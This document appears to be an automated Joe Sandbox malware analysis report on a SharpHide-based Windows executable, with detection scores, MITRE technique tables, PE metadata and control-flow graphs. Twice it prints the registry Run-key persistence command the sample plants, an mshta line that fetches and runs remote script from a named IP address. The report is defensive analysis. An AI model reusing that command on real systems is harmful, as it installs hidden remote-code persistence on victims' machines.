Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ithDgrzsHr.exe

Overview

General Information

Sample name:ithDgrzsHr.exe
renamed because original name is a hash value
Original sample name:9dd4d422cb1e990728fb1f487b3629ef1f372a720312457bf28bb9eeaa4fb26a(1).exe
Analysis ID:1591117
MD5:8303d22feb4c8cb2fba2f01bf605558d
SHA1:57f38a89633dc06145d7a26a1879b8beb58d9d9d
SHA256:9dd4d422cb1e990728fb1f487b3629ef1f372a720312457bf28bb9eeaa4fb26a
Tags:exeSharpHideuser-JAMESWT_MHT
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ithDgrzsHr.exe (PID: 8100 cmdline: "C:\Users\user\Desktop\ithDgrzsHr.exe" MD5: 8303D22FEB4C8CB2FBA2F01BF605558D)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta vbscript:close(CreateObject("WScript.Shell").Run("mshta http://185.147.124.40/x",0)), EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ithDgrzsHr.exe, ProcessId: 8100, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ithDgrzsHr.exeVirustotal: Detection: 58%Perma Link
Source: ithDgrzsHr.exeReversingLabs: Detection: 52%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.0% probability
Source: ithDgrzsHr.exeJoe Sandbox ML: detected
Source: ithDgrzsHr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: ithDgrzsHr.exe
Source: C:\Users\user\Desktop\ithDgrzsHr.exeCode function: 4x nop then jmp 00007FF7C0ED0CB8h0_2_00007FF7C0ED094C
Source: ithDgrzsHr.exeString found in binary or memory: http://185.147.124.40/x
Source: ithDgrzsHr.exe, 00000000.00000002.1334331551.000002E517771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\ithDgrzsHr.exeCode function: 0_2_00007FF7C0ED10CD NtSetValueKey,0_2_00007FF7C0ED10CD
Source: ithDgrzsHr.exe, 00000000.00000000.1303438678.000002E515A22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSharpHide.exe4 vs ithDgrzsHr.exe
Source: ithDgrzsHr.exeBinary or memory string: OriginalFilenameSharpHide.exe4 vs ithDgrzsHr.exe
Source: classification engineClassification label: mal64.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\ithDgrzsHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ithDgrzsHr.exe.logJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeMutant created: NULL
Source: ithDgrzsHr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ithDgrzsHr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ithDgrzsHr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ithDgrzsHr.exeVirustotal: Detection: 58%
Source: ithDgrzsHr.exeReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: ithDgrzsHr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ithDgrzsHr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ithDgrzsHr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: ithDgrzsHr.exe
Source: ithDgrzsHr.exeStatic PE information: 0xF69503B8 [Fri Feb 4 11:49:12 2101 UTC]
Source: C:\Users\user\Desktop\ithDgrzsHr.exeCode function: 0_2_00007FF7C0ED00BD pushad ; iretd 0_2_00007FF7C0ED00C1

Boot Survival

barindex
Source: C:\Users\user\Desktop\ithDgrzsHr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL mshta vbscript:close(CreateObject("WScript.Shell").Run("mshta http://185.147.124.40/x",0))Jump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeMemory allocated: 2E515D60000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeMemory allocated: 2E52F770000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exe TID: 8176Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\ithDgrzsHr.exeQueries volume information: C:\Users\user\Desktop\ithDgrzsHr.exe VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Masquerading
OS Credential Dumping31
Virtualization/Sandbox Evasion
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job21
Registry Run Keys / Startup Folder
21
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory11
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Timestomp
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ithDgrzsHr.exe58%VirustotalBrowse
ithDgrzsHr.exe53%ReversingLabsWin32.Trojan.SharpHide
ithDgrzsHr.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.147.124.40/x0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0017.t-0009.t-msedge.net
13.107.246.45
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://185.147.124.40/xithDgrzsHr.exetrue
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameithDgrzsHr.exe, 00000000.00000002.1334331551.000002E517771000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      No contacted IP infos
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1591117
      Start date and time:2025-01-14 17:51:12 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 10s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:2
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:ithDgrzsHr.exe
      renamed because original name is a hash value
      Original Sample Name:9dd4d422cb1e990728fb1f487b3629ef1f372a720312457bf28bb9eeaa4fb26a(1).exe
      Detection:MAL
      Classification:mal64.winEXE@1/1@0/0
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 4
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Excluded IPs from analysis (whitelisted): 13.107.246.45
      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
      No simulations
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      s-part-0017.t-0009.t-msedge.nethttp://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407Get hashmaliciousHTMLPhisherBrowse
      • 13.107.246.45
      Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
      • 13.107.246.45
      http://www.affordablehousing.com/MaineCWLGet hashmaliciousUnknownBrowse
      • 13.107.246.45
      https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==Get hashmaliciousHTMLPhisherBrowse
      • 13.107.246.45
      Payment Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
      • 13.107.246.45
      https://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
      • 13.107.246.45
      http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
      • 13.107.246.45
      tpmbypassprivatestore.exeGet hashmaliciousUnknownBrowse
      • 13.107.246.45
      hhcqxkb.exeGet hashmaliciousUnknownBrowse
      • 13.107.246.45
      Subscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
      • 13.107.246.45
      No context
      No context
      No context
      Process:C:\Users\user\Desktop\ithDgrzsHr.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):42
      Entropy (8bit):4.0050635535766075
      Encrypted:false
      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
      MD5:84CFDB4B995B1DBF543B26B86C863ADC
      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
      Malicious:true
      Reputation:high, very likely benign file
      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):4.766501927018054
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:ithDgrzsHr.exe
      File size:8'192 bytes
      MD5:8303d22feb4c8cb2fba2f01bf605558d
      SHA1:57f38a89633dc06145d7a26a1879b8beb58d9d9d
      SHA256:9dd4d422cb1e990728fb1f487b3629ef1f372a720312457bf28bb9eeaa4fb26a
      SHA512:840625192c54fe13fc19c6499497b8bcf74c867ca44368f3765158396e0b010eb5844ed5ee75bbf4dd7bec8f6ad51f598fb2261558748f73612956d30b9e4a78
      SSDEEP:96:9hy7QzVOkNerPJfe00walk2NBiDsw0TVoQh01d2HalzapwzNt:9sQ4TeRTlPY9QhiMHalz4S
      TLSH:D8F1E702E7D44632F5FB1B35A87302014B3AFB119C76E76F168A010F2E377618E613A6
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............5... ...@....@.. ....................................`................................
      Icon Hash:90cececece8e8eb0
      Entrypoint:0x4035fa
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0xF69503B8 [Fri Feb 4 11:49:12 2101 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x35a50x4f.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x5ac.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x34ec0x38.text
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x20000x16000x1600f21db4fd77e2c2db959b9232a2deec36False0.5301846590909091data5.273188234486718IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rsrc0x40000x5ac0x6007236c0239093a47bf19192d5529118b5False0.416015625data4.079919292114151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x60000xc0x20003d74a4cecdbd1e95c7eab848bf15b34False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_VERSION0x40900x31cdata0.42839195979899497
      RT_MANIFEST0x43bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
      DLLImport
      mscoree.dll_CorExeMain
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jan 14, 2025 17:52:09.270117998 CET1.1.1.1192.168.2.100x5a43No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
      Jan 14, 2025 17:52:09.270117998 CET1.1.1.1192.168.2.100x5a43No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:11:52:10
      Start date:14/01/2025
      Path:C:\Users\user\Desktop\ithDgrzsHr.exe
      Wow64 process (32bit):false
      Commandline:"C:\Users\user\Desktop\ithDgrzsHr.exe"
      Imagebase:0x2e515a20000
      File size:8'192 bytes
      MD5 hash:8303D22FEB4C8CB2FBA2F01BF605558D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:42.3%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:33.3%
        Total number of Nodes:9
        Total number of Limit Nodes:0

        Callgraph

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 11 7ff7c0ed10cd-7ff7c0ed10d1 12 7ff7c0ed10d3-7ff7c0ed10d4 11->12 13 7ff7c0ed10d6-7ff7c0ed1235 NtSetValueKey 11->13 12->13 17 7ff7c0ed123d-7ff7c0ed1291 13->17 18 7ff7c0ed1237 13->18 18->17
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.1334716396.00007FF7C0ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0ED0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ff7c0ed0000_ithDgrzsHr.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 52244961c5a8f757dba01b088550521b23b6772043461446f2e07fd0bb23a2cd
        • Instruction ID: 5f23454acf9907bd7a04f31c9c6d07308c490ab0bce096ffbd9623a5795a8efd
        • Opcode Fuzzy Hash: 52244961c5a8f757dba01b088550521b23b6772043461446f2e07fd0bb23a2cd
        • Instruction Fuzzy Hash: F4511570908A5C8FDB98EF58C885BE9BBF1FB69310F1051AED44DE3252DB71A981CB44

        Control-flow Graph

        Memory Dump Source
        • Source File: 00000000.00000002.1334716396.00007FF7C0ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0ED0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ff7c0ed0000_ithDgrzsHr.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: da162c258309dc847f08841176f6edba3f3c8163a51a78ca40df70d4154f6ff7
        • Instruction ID: ed6bac584f62a9c2a99b8f9f8f0bc9f78b2b56b6db3a11545057358bcd30e044
        • Opcode Fuzzy Hash: da162c258309dc847f08841176f6edba3f3c8163a51a78ca40df70d4154f6ff7
        • Instruction Fuzzy Hash: 19C12670D4861D8FDBA8EF58C890BADB7B1EF59310F5541AAC04DE7392DB34AA84CB50

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.1334716396.00007FF7C0ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0ED0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ff7c0ed0000_ithDgrzsHr.jbxd
        Similarity
        • API ID: Open
        • String ID:
        • API String ID: 71445658-0
        • Opcode ID: eba3ae66f1ad49b6f14f980390027be20559a516f10b9b7369f35bd62797ed06
        • Instruction ID: fc2eb6ca11003e846760f25d34db5ae1ab1a2e262e3d3cddfc31f9f90d978817
        • Opcode Fuzzy Hash: eba3ae66f1ad49b6f14f980390027be20559a516f10b9b7369f35bd62797ed06
        • Instruction Fuzzy Hash: 1A51F370908A5C8FDB98EF98C885BE9BBF1FB69311F1041AED44DE3251DB74A981CB40

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 20 7ff7c0ed1295-7ff7c0ed12a1 21 7ff7c0ed12a3-7ff7c0ed12ab 20->21 22 7ff7c0ed12ac-7ff7c0ed1382 RegCloseKey 20->22 21->22 26 7ff7c0ed1384 22->26 27 7ff7c0ed138a-7ff7c0ed13d4 22->27 26->27
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.1334716396.00007FF7C0ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0ED0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_7ff7c0ed0000_ithDgrzsHr.jbxd
        Similarity
        • API ID: Close
        • String ID:
        • API String ID: 3535843008-0
        • Opcode ID: 481936e67e2e0d0cab2e063dea495050eb94a7f82ee9559447c89ac742e29472
        • Instruction ID: 7ddfa0b365fea674657b0625ea9712d67988f027b2d111d5312fffd803c0c522
        • Opcode Fuzzy Hash: 481936e67e2e0d0cab2e063dea495050eb94a7f82ee9559447c89ac742e29472
        • Instruction Fuzzy Hash: 53414A70D0864C8FDB58EFA8D889AADBBF0FB5A310F14416AD449E7252DB70A845CB41